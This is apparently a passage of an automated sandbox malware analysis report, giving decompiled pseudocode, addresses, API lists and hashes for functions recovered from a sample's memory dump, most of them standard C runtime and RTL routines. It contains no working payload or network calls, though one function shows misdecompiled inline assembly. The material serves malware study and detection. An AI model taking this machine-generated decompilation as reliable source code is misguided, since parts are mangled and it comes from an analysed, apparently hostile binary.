						while(1) {
							 *(_t83 - 0x1c) = _t70;
							__eflags = _t70 - 0x101;
							if(_t70 >= 0x101) {
								goto L14;
							}
							 *((char*)(_t70 + 0x9ce8c0)) =  *((intOrPtr*)(_t70 + _t61 + 0x18));
							_t70 = _t70 + 1;
						}
						while(1) {
							L14:
							 *(_t83 - 0x1c) = _t82;
							__eflags = _t82 - 0x100;
							if(_t82 >= 0x100) {
								break;
							}
							 *((char*)(_t82 + 0x9ce9c8)) =  *((intOrPtr*)(_t82 + _t61 + 0x119));
							_t82 = _t82 + 1;
						}
						__eflags = _t70 | 0xffffffff;
						asm("lock xadd [eax], ecx");
						if((_t70 | 0xffffffff) == 0) {
							_t55 =  *0x9cecec; // 0x9ceac8
							__eflags = _t55 - 0x9ceac8;
							if(_t55 != 0x9ceac8) {
								E009B2248(_t55);
							}
						}
						 *0x9cecec = _t61;
						asm("lock xadd [ebx], eax");
						 *(_t83 - 4) = 0xfffffffe;
						E009B48B3();
					}
					goto L24;
				}
			}











                                                          0x009a6ae8
                                                          0x009a6ae8
                                                          0x009b4784
                                                          0x009b4786
                                                          0x009b48e1
                                                          0x009b48e8
                                                          0x009b478c
                                                          0x009b4799
                                                          0x009b479b
                                                          0x009b479d
                                                          0x009b47aa
                                                          0x009b47ac
                                                          0x009b47b1
                                                          0x009b48be
                                                          0x009b48c1
                                                          0x009b48c3
                                                          0x009b48c9
                                                          0x009b48cc
                                                          0x009b48d1
                                                          0x009b48d7
                                                          0x009b48d7
                                                          0x00000000
                                                          0x009b48c1
                                                          0x009b47b7
                                                          0x009b47c0
                                                          0x009b47c4
                                                          0x009b47c6
                                                          0x009b47cf
                                                          0x009b47d2
                                                          0x009b47d8
                                                          0x009b47d8
                                                          0x009b47cf
                                                          0x009b47db
                                                          0x009b47e1
                                                          0x009b47ec
                                                          0x009b4801
                                                          0x009b4807
                                                          0x009b480d
                                                          0x009b4815
                                                          0x009b4820
                                                          0x009b4825
                                                          0x009b4827
                                                          0x009b4827
                                                          0x009b482d
                                                          0x00000000
                                                          0x00000000
                                                          0x009b4834
                                                          0x009b483c
                                                          0x009b483c
                                                          0x009b483f
                                                          0x009b4841
                                                          0x009b4841
                                                          0x009b4844
                                                          0x009b484a
                                                          0x00000000
                                                          0x00000000
                                                          0x009b4850
                                                          0x009b4856
                                                          0x009b4856
                                                          0x009b4859
                                                          0x009b4859
                                                          0x009b4859
                                                          0x009b485c
                                                          0x009b4862
                                                          0x00000000
                                                          0x00000000
                                                          0x009b486b
                                                          0x009b4871
                                                          0x009b4871
                                                          0x009b4879
                                                          0x009b487c
                                                          0x009b4880
                                                          0x009b4882
                                                          0x009b4887
                                                          0x009b488c
                                                          0x009b488f
                                                          0x009b4894
                                                          0x009b488c
                                                          0x009b4895
                                                          0x009b489e
                                                          0x009b48a2
                                                          0x009b48a9
                                                          0x009b48a9
                                                          0x00000000
                                                          0x009b47ec

                                                          APIs
                                                          • __setmbcp_nolock.LIBCMT ref: 009B47A3
                                                            • Part of subcall function 009B48E9: getSystemCP.LIBCMT ref: 009B4901
                                                            • Part of subcall function 009B48E9: setSBCS.LIBCMT ref: 009B490E
                                                          • _free.LIBCMT ref: 009B47D2
                                                            • Part of subcall function 009B2248: HeapFree.KERNEL32(00000000,00000000), ref: 009B225C
                                                            • Part of subcall function 009B2248: GetLastError.KERNEL32(00000000,?,009B060D,00000000,?,009CE000), ref: 009B226E
                                                          • __lock.LIBCMT ref: 009B4801
                                                          • _free.LIBCMT ref: 009B488F
                                                          • _free.LIBCMT ref: 009B48CC
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLastSystem__lock__setmbcp_nolock
                                                          • String ID:
                                                          • API String ID: 2025676541-0
                                                          • Opcode ID: 892a9b0d980b05250adc93d2c362be02ae8a97b95cea822657832b982ed6507f
                                                          • Instruction ID: 15082d5e1f2e5f5613b2308eabd6146c6695541089bec513520f9c58288ead37
                                                          • Opcode Fuzzy Hash: 892a9b0d980b05250adc93d2c362be02ae8a97b95cea822657832b982ed6507f
                                                          • Instruction Fuzzy Hash: 2F41F574D542848FDB15DF68D9C0BE877E8FB45330B24416DE8669B693CB388C42EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B6902 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E009B6902(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x9cf22c, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x9d0060 == _t7) {
									_t9 = E009AF100();
									 *_t9 = E009AF159(GetLastError());
									goto L17;
								} else {
									if(E009B4C7E(_t7, _t31) == 0) {
										_t12 = E009AF100();
										 *_t12 = E009AF159(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E009B4C7E(_t6, _t31);
						 *((intOrPtr*)(E009AF100())) = 0xc;
						goto L12;
					} else {
						E009B2248(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E009B6870(__ebx, __edx, __edi, _a8);
				}
			}









                                                          0x009b6909
                                                          0x009b6917
                                                          0x009b691c
                                                          0x009b692b
                                                          0x009b695e
                                                          0x009b6930
                                                          0x009b6932
                                                          0x009b6932
                                                          0x009b693f
                                                          0x009b6945
                                                          0x009b6949
                                                          0x009b69a9
                                                          0x009b69a9
                                                          0x009b694b
                                                          0x009b6951
                                                          0x009b6993
                                                          0x009b69a7
                                                          0x00000000
                                                          0x009b6953
                                                          0x009b695c
                                                          0x009b697b
                                                          0x009b698f
                                                          0x009b6975
                                                          0x009b6975
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009b695c
                                                          0x009b6951
                                                          0x00000000
                                                          0x009b6977
                                                          0x009b6964
                                                          0x009b696f
                                                          0x00000000
                                                          0x009b691e
                                                          0x009b6921
                                                          0x009b6927
                                                          0x009b6927
                                                          0x009b6978
                                                          0x009b697a
                                                          0x009b690b
                                                          0x009b6915
                                                          0x009b6915

                                                          APIs
                                                          • _malloc.LIBCMT ref: 009B690E
                                                            • Part of subcall function 009B6870: __FF_MSGBANNER.LIBCMT ref: 009B6887
                                                            • Part of subcall function 009B6870: __NMSG_WRITE.LIBCMT ref: 009B688E
                                                            • Part of subcall function 009B6870: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,009B22DE,00000000,00000000,00000000,00000000,?,009B2193,00000018,009CC228), ref: 009B68B3
                                                          • _free.LIBCMT ref: 009B6921
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap_free_malloc
                                                          • String ID:
                                                          • API String ID: 2734353464-0
                                                          • Opcode ID: 1c5b241c96fe85e4035ba39a9651c938ae6608e1e921a3bc85767cb8b7f9a249
                                                          • Instruction ID: 580ec1b5ae87a2f4d2080605421722227a8d25995727818da3d88966004fae7a
                                                          • Opcode Fuzzy Hash: 1c5b241c96fe85e4035ba39a9651c938ae6608e1e921a3bc85767cb8b7f9a249
                                                          • Instruction Fuzzy Hash: B811C63281D215EFCB212FB0EE147EA3B98AF453B0F204539F949DA161DB38A84096D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A6016 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E009A6016(signed char __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				signed int _t37;
				signed int _t40;
				signed int _t48;
				void* _t50;
				signed int _t52;
				void* _t53;
				void* _t56;
				signed int _t57;
				void* _t58;

				_t56 = __esi;
				_t53 = __edi;
				_t50 = __edx;
				_t42 = __ebx;
				if(__eflags != 0) {
					_t42 = __ebx + 0x20;
				}
				if(( *(_t58 + 0xc) & 0x00004000) != 0) {
					_t42 = _t42 | 0x00000080;
				}
				if(( *(_t58 + 0xc) & 0x00000080) != 0) {
					_t42 = _t42 | 0x00000010;
				}
				_t30 = GetFileType( *(_t58 + 8));
				if(_t30 != 0) {
					__eflags = _t30 - 2;
					if(__eflags != 0) {
						__eflags = _t30 - 3;
						if(__eflags == 0) {
							_t42 = _t42 | 0x00000008;
							__eflags = _t42;
						}
					} else {
						_t42 = _t42 | 0x00000040;
					}
					_t57 = E009B3A06(_t42, _t50, _t53, _t56, __eflags);
					 *(_t58 + 0xc) = _t57;
					__eflags = _t57 - 0xffffffff;
					if(_t57 != 0xffffffff) {
						 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
						E009B3DB2(_t57,  *(_t58 + 8));
						_t52 = _t57 >> 5;
						_t48 = (_t57 & 0x0000001f) << 6;
						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 4) = _t42 | 0x00000001;
						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) =  *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) & 0x00000080;
						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) =  *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) & 0x0000007f;
						 *((intOrPtr*)(_t58 - 0x1c)) = 1;
						 *(_t58 - 4) = 0xfffffffe;
						E009B3D8D(1, _t57);
						__eflags = 1;
						if(1 == 0) {
							_t57 = _t57 | 0xffffffff;
							__eflags = _t57;
						}
						_t37 = _t57;
					} else {
						 *((intOrPtr*)(E009AF100())) = 0x18;
						_t40 = E009AF0CC();
						 *_t40 =  *_t40 & 0x00000000;
						goto L9;
					}
				} else {
					_t40 = E009AF0DF(GetLastError());
					L9:
					_t37 = _t40 | 0xffffffff;
				}
				return E009AF225(_t37);
			}













                                                          0x009a6016
                                                          0x009a6016
                                                          0x009a6016
                                                          0x009a6016
                                                          0x009b3cb2
                                                          0x009b3cb4
                                                          0x009b3cb4
                                                          0x009b3cbe
                                                          0x009b3cc0
                                                          0x009b3cc0
                                                          0x009b3cc7
                                                          0x009b3cc9
                                                          0x009b3cc9
                                                          0x009b3ccf
                                                          0x009b3cd7
                                                          0x009b3cee
                                                          0x009b3cf1
                                                          0x009b3cf8
                                                          0x009b3cfb
                                                          0x009b3cfd
                                                          0x009b3cfd
                                                          0x009b3cfd
                                                          0x009b3cf3
                                                          0x009b3cf3
                                                          0x009b3cf3
                                                          0x009b3d05
                                                          0x009b3d07
                                                          0x009b3d0a
                                                          0x009b3d0d
                                                          0x009b3d24
                                                          0x009b3d2c
                                                          0x009b3d38
                                                          0x009b3d40
                                                          0x009b3d4a
                                                          0x009b3d55
                                                          0x009b3d61
                                                          0x009b3d69
                                                          0x009b3d6c
                                                          0x009b3d73
                                                          0x009b3d78
                                                          0x009b3d7a
                                                          0x009b3d7c
                                                          0x009b3d7c
                                                          0x009b3d7c
                                                          0x009b3d7f
                                                          0x009b3d0f
                                                          0x009b3d14
                                                          0x009b3d1a
                                                          0x009b3d1f
                                                          0x00000000
                                                          0x009b3d1f
                                                          0x009b3cd9
                                                          0x009b3ce0
                                                          0x009b3ce6
                                                          0x009b3ce6
                                                          0x009b3ce6
                                                          0x009b3d86

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                          • String ID:
                                                          • API String ID: 43408053-0
                                                          • Opcode ID: 2e04a13d24654045013decf1bdae54fbc133757c4ac394d5a4645ba2a096ef4b
                                                          • Instruction ID: 9e8aab5806c284d91b9b5f50a4a9beef4495bb816137996ca4eef90094ce3e9b
                                                          • Opcode Fuzzy Hash: 2e04a13d24654045013decf1bdae54fbc133757c4ac394d5a4645ba2a096ef4b
                                                          • Instruction Fuzzy Hash: E4212B319195106ACB21DBB8DE157E87F545F81334F28C718E8B15B2E3C7389B06AB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A2695 Relevance: 7.6, APIs: 5, Instructions: 59fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E009A2695(void* __eax, signed char __ecx, signed int __edx, signed int* __edi) {
				intOrPtr _t33;
				intOrPtr _t36;
				intOrPtr _t48;
				signed char _t50;
				signed char _t63;
				signed int _t65;
				signed int _t67;
				signed int* _t68;
				void* _t73;
				void* _t80;

				_t68 = __edi;
				_t50 = __ecx;
				_t63 = __edx ^ __edx;
				asm("pushfd");
				_t1 = _t63 + 0x24243244;
				 *_t1 =  *((intOrPtr*)(_t63 + 0x24243244)) + __ecx;
				if( *_t1 <= 0) {
					asm("enter 0x4c88, 0x32");
					_t80 = _t73 - 1;
					asm("adc al, 0x38");
					_pop(_t73);
				}
				asm("std");
				if(_t80 == 0 && (_t50 & 0x00000008) != 0) {
					 *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) | 0x00000020;
					_t50 =  *(_t73 + 0x14);
				}
				_t70 =  *(_t73 - 8);
				if(( *(_t73 - 8) & 0xc0000000) == 0xc0000000) {
					_t84 = _t50 & 0x00000001;
					if((_t50 & 0x00000001) != 0) {
						CloseHandle( *(_t73 - 0x1c));
						_t36 = E009B23DE(_t50, _t84,  *((intOrPtr*)(_t73 + 0x10)), _t70 & 0x7fffffff,  *((intOrPtr*)(_t73 - 0xc)), _t73 - 0x38, 3,  *((intOrPtr*)(_t73 - 0x18)),  *((intOrPtr*)(_t73 - 0x10)));
						if(_t36 != 0xffffffff) {
							_t65 =  *_t68;
							_t67 = (_t65 & 0x0000001f) << 6;
							__eflags = _t67;
							 *((intOrPtr*)(_t67 +  *((intOrPtr*)(0x9cf230 + (_t65 >> 5) * 4)))) = _t36;
						} else {
							E009AF0DF(GetLastError());
							 *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) & 0x000000fe;
							E009B3BAF( *_t68);
							_t48 =  *((intOrPtr*)(E009AF100()));
						}
					}
				}
				_t33 = _t48;
				return _t33;
			}













                                                          0x009a2695
                                                          0x009a2695
                                                          0x009b2c8d
                                                          0x009b2c8f
                                                          0x009b2c90
                                                          0x009b2c90
                                                          0x009b2c96
                                                          0x009b2c98
                                                          0x009b2c9e
                                                          0x009b2c9f
                                                          0x009b2ca1
                                                          0x009b2ca1
                                                          0x009b2ca2
                                                          0x009b2ca3
                                                          0x009b2cbe
                                                          0x009b2cc3
                                                          0x009b2cc3
                                                          0x009b2cc6
                                                          0x009b2cd4
                                                          0x009b2cd6
                                                          0x009b2cd9
                                                          0x009b2cde
                                                          0x009b2cfd
                                                          0x009b2d08
                                                          0x009b2d3c
                                                          0x009b2d46
                                                          0x009b2d46
                                                          0x009b2d50
                                                          0x009b2d0a
                                                          0x009b2d11
                                                          0x009b2d2a
                                                          0x009b2d31
                                                          0x009b28db
                                                          0x009b28db
                                                          0x009b2d08
                                                          0x009b2cd9
                                                          0x009b2d53
                                                          0x009b2841

                                                          APIs
                                                          • CloseHandle.KERNEL32(?), ref: 009B2CDE
                                                          • ___createFile.LIBCMT ref: 009B2CFD
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009B2D0A
                                                          • __dosmaperr.LIBCMT ref: 009B2D11
                                                          • __free_osfhnd.LIBCMT ref: 009B2D31
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorFileHandleLast___create__dosmaperr__free_osfhnd
                                                          • String ID:
                                                          • API String ID: 1832824508-0
                                                          • Opcode ID: ebfef6d7fe2523746f2376dd0dd6234c98734da68e2d6faa07b1d551e8c7d4d6
                                                          • Instruction ID: 51bb2f7f9d771b055be6b00e6ef8734223032a922ed6864034bb30c536be8733
                                                          • Opcode Fuzzy Hash: ebfef6d7fe2523746f2376dd0dd6234c98734da68e2d6faa07b1d551e8c7d4d6
                                                          • Instruction Fuzzy Hash: 0811763192010A5FCB0A8F64EF54AEDBF26FB44370F288218F961572E2CB228D11D780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A253A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 45%
                                                          			E00A253A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00ae01c0;
									_push(_t92);
									_push(0);
									_t37 = L009FF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L00A44FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L00A53F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00A8217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00A53F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									L00A43915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00A25384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = L009FF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											L00A43915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = L009FF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												L00A43915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = L009FF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = L00A43915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00A25329(_t74, _t92);
													_push(1);
													_t48 = E00A253A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                          0x00a253ab
                                                          0x00a253ae
                                                          0x00a253b1
                                                          0x00a253b4
                                                          0x00a253b7
                                                          0x00a405b6
                                                          0x00a405c0
                                                          0x00a405c3
                                                          0x00000000
                                                          0x00a405c9
                                                          0x00a405c9
                                                          0x00a405cc
                                                          0x00a405d5
                                                          0x00a405d5
                                                          0x00a253bd
                                                          0x00a253bd
                                                          0x00a253bd
                                                          0x00a253be
                                                          0x00a253be
                                                          0x00a253be
                                                          0x00a253c0
                                                          0x00000000
                                                          0x00000000
                                                          0x00a62269
                                                          0x00a6226d
                                                          0x00a62349
                                                          0x00a6234d
                                                          0x00a62273
                                                          0x00a62276
                                                          0x00a62279
                                                          0x00a6227e
                                                          0x00a62283
                                                          0x00a62287
                                                          0x00a6228a
                                                          0x00a6228d
                                                          0x00a6228f
                                                          0x00a622bc
                                                          0x00a622bc
                                                          0x00a622bc
                                                          0x00a622be
                                                          0x00a622c4
                                                          0x00a622cc
                                                          0x00a622d0
                                                          0x00a622d6
                                                          0x00a622d7
                                                          0x00a622da
                                                          0x00a622df
                                                          0x00a622e4
                                                          0x00000000
                                                          0x00000000
                                                          0x00a622e6
                                                          0x00a622e9
                                                          0x00a622f4
                                                          0x00a622f9
                                                          0x00a622fa
                                                          0x00a62305
                                                          0x00a62314
                                                          0x00a62319
                                                          0x00a6231a
                                                          0x00a6231d
                                                          0x00a62320
                                                          0x00a62323
                                                          0x00a62323
                                                          0x00a62328
                                                          0x00a6232d
                                                          0x00a6232f
                                                          0x00a62331
                                                          0x00a62336
                                                          0x00a62336
                                                          0x00a6233b
                                                          0x00a6233d
                                                          0x00a62350
                                                          0x00a62351
                                                          0x00a62356
                                                          0x00a62359
                                                          0x00a62359
                                                          0x00a6235b
                                                          0x00a6235d
                                                          0x00a25367
                                                          0x00a2536b
                                                          0x00a25372
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00a62363
                                                          0x00a62363
                                                          0x00a62369
                                                          0x00a6236a
                                                          0x00a6236c
                                                          0x00a62371
                                                          0x00a62373
                                                          0x00000000
                                                          0x00a62379
                                                          0x00a62379
                                                          0x00a6237a
                                                          0x00a6237f
                                                          0x00a6237f
                                                          0x00a62385
                                                          0x00a62386
                                                          0x00a62389
                                                          0x00a6238e
                                                          0x00a62390
                                                          0x00a25378
                                                          0x00a2537c
                                                          0x00a62396
                                                          0x00a62396
                                                          0x00a62397
                                                          0x00a6239c
                                                          0x00a623a2
                                                          0x00a623a3
                                                          0x00a623a6
                                                          0x00a623ab
                                                          0x00a623ad
                                                          0x00000000
                                                          0x00a623b3
                                                          0x00a623b3
                                                          0x00a623b4
                                                          0x00a623b9
                                                          0x00a623ba
                                                          0x00a623ba
                                                          0x00a623bc
                                                          0x00a623bf
                                                          0x00000000
                                                          0x00000000
                                                          0x00a59153
                                                          0x00a59158
                                                          0x00a5915a
                                                          0x00a5915e
                                                          0x00a59160
                                                          0x00000000
                                                          0x00a59166
                                                          0x00a59166
                                                          0x00a59171
                                                          0x00a59176
                                                          0x00a59176
                                                          0x00000000
                                                          0x00a59160
                                                          0x00a623c6
                                                          0x00a623cb
                                                          0x00a623ce
                                                          0x00a623d7
                                                          0x00a623d7
                                                          0x00a623ad
                                                          0x00a62390
                                                          0x00a62373
                                                          0x00a6233f
                                                          0x00a6233f
                                                          0x00000000
                                                          0x00a6233f
                                                          0x00a62291
                                                          0x00a62291
                                                          0x00a62293
                                                          0x00a62295
                                                          0x00a6229a
                                                          0x00a622a1
                                                          0x00a622a3
                                                          0x00a622a7
                                                          0x00a622a9
                                                          0x00000000
                                                          0x00000000
                                                          0x00a622ab
                                                          0x00a622ad
                                                          0x00a622af
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00a622af
                                                          0x00a622b1
                                                          0x00a622b4
                                                          0x00a622b4
                                                          0x00a622b6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00a622b6
                                                          0x00a6228f
                                                          0x00000000
                                                          0x00a6226d
                                                          0x00a253cb
                                                          0x00a253ce
                                                          0x00a253d0
                                                          0x00a253d4
                                                          0x00a253d6
                                                          0x00000000
                                                          0x00a253d8
                                                          0x00a253e3
                                                          0x00a253ea
                                                          0x00a253ea
                                                          0x00a253d6
                                                          0x00000000

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A622F4
                                                          Strings
                                                          • RTL: Resource at %p, xrefs: 00A6230B
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A622FC
